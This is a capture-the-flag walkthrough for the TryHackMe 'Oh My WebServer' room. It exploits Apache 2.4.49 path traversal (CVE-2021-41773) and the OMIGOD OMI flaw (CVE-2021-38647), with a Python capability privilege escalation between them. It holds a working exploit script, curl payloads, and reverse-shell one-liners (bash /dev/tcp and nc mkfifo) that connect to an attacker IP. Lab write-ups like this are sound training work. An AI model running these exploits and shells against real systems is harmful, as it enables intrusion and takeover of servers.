Oh My WebServer

Posted on | In

You can find this machine here : https://tryhackme.com/room/ohmyweb

Port Scan

1
2
3
4
5
6
┌──(kali㉿Zeus)-[~]
└─$ sudo nmap -Pn -sV ohmyweb.thm

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.49 ((Unix))

Directory Scan

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿Zeus)-[~]
└─$  dirb http://ohmyweb.thm/

URL_BASE: http://ohmyweb.thm/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://ohmyweb.thm/ ----
==> DIRECTORY: http://ohmyweb.thm/
+ http://ohmyweb.thm/cgi-bin/ (CODE:403|SIZE:199

Wappalyzer - Port 80

image

Searching

Search : Apache httpd 2.4.49 exploit Result : https://www.exploit-db.com/exploits/50383

Apache HTTP Server 2.4.49 - Path Traversal & RCE

CVE : CVE-2021-41773

1
2
3
4
5
6
7
8
9
10
#!/bin/bash

if [[ $1 == '' ]]; [[ $2 == '' ]]; then
echo Set [TAGET-LIST.TXT] [PATH] [COMMAND]
echo ./PoC.sh targets.txt /etc/passwd
exit
fi
for host in $(cat $1); do
echo $host
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done

1
2
3
4
5
┌──(kali㉿Zeus)-[~/Desktop]
└─$ ./ohmyweb.sh targets.txt /bin/sh "whoami;id"
ohmyweb.thm
daemon
uid=1(daemon) gid=1(daemon) groups=1(daemon)

image

Reverse Shell Creation

Source : https://www.youtube.com/watch?v=WSVcuV2Wc58

1
curl 'http://ohmyweb.thm/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo Content-Type: text/plain; echo; echo "#!/bin/bash" > /tmp/alienum.sh'

1
curl 'http://ohmyweb.thm/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo Content-Type: text/plain; echo; echo "bash -i >& /dev/tcp/10.18.45.56/4444 0>&1" >> /tmp/alienum.sh'

1
curl 'http://ohmyweb.thm/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo Content-Type: text/plain; echo; cat /tmp/alienum.sh'

1
curl 'http://ohmyweb.thm/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo Content-Type: text/plain; echo; bash /tmp/alienum.sh'

image

Better Shell

1
2
3
4
5
6
python3 -c 'import pty; pty.spawn("/bin/bash")'
CTRL + Z
stty raw -echo;fg
ENTER
export TERM=xterm
export HOME=/home

LinPeas

image

1
2
Files with capabilities (limited to 50):
/usr/bin/python3.7 = cap_setuid+ep

Linux Capabilities - Privileges Escalation

1
2
3
daemon@4a70924bafa0:~$ getcap -r / 2>/dev/null
/usr/bin/python3.7 = cap_setuid+ep
daemon@4a70924bafa0:~$

1
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

User Owned - Proof

image

Found IP

image

Host Discovery

  • awk

image

  • arp
1
2
root@4a70924bafa0:~# arp -a
ip-172-17-0-1.eu-west-1.compute.internal (172.17.0.1) at 02:42:1e:60:bf:4a [ether] on eth0

image

Port Scan

Binary here : https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap

1
curl 10.18.45.56/nmap -o nmap

image

  • Starting the Scan
1
2
3
4
5
6
7
root@4a70924bafa0:~# ./nmap 172.17.0.1 -p- --min-rate 4000

PORT     STATE  SERVICE
22/tcp   open   ssh
80/tcp   open   http
5985/tcp closed unknown
5986/tcp open   unknown

image

Identify The Service (Port 5986)

image

image

OMIGOD Unauthenticated RCE

  • Source : https://github.com/AlteredSecurity/CVE-2021-38647
  • Source : https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure/
1
2
wget https://raw.githubusercontent.com/AlteredSecurity/CVE-2021-38647/main/CVE-2021-38647.py
python3 -m http.server 80

1
curl 10.18.45.56/CVE-2021-38647.py -o exploit.py

image

1
python3 exploit.py -t 172.17.0.1 -p 5986 -c 'id'

image

Reverse Shell - Root Owned

1
python3 exploit.py -t 172.17.0.1 -p 5986 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.18.45.56 6666 >/tmp/f'

image